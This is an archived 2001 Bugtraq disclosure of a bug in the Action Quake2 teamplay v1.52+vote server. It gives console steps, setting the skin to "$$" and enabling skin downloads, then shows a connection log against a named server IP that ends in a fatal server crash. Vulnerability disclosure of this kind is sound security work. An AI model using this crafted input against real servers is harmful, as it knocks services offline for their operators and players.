[19217] in bugtraq
Bug in Action Quake2 v1.52+vote
daemon@ATHENA.MIT.EDU (Jordan T.)
Wed Feb 14 12:44:44 2001
Content-Type: text/plain
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <01021417242801.03722@mrx.exploit.cx>
Date: Wed, 14 Feb 2001 17:21:38 +0800
Reply-To: jordan@blue-ferret.com.au
From: "Jordan T." <jordan@BLUE-FERRET.COM.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Bugtraq,
A friend of mine has discovered a possible bug in Action Quake2 teamplay
v1.52+vote that allows any player to crash the server.
he can be reached at deathboy99@hotmail.com.
here are the details..
connect to the server, hit the console key " ` " and type this:
set skin "$$" (with the double quotes)
goto multiplayer options, player options, and select allow downloading and make
sure you allow skin downloading
then reconnect to the server and the following should happen:
]set skin "$$"
]connect 203.166.224.43:27910
Connecting to 203.166.224.43:27910...
203.166.224.43:27910: challenge
203.166.224.43:27910: client_connect
The Crack Down
Refusing to download a path with ..
Refusing to download a path with ..
Downloading players/$$/tris.md2
Server fatal crashed: FS_Read: 0 bytes read
I have confirmed this.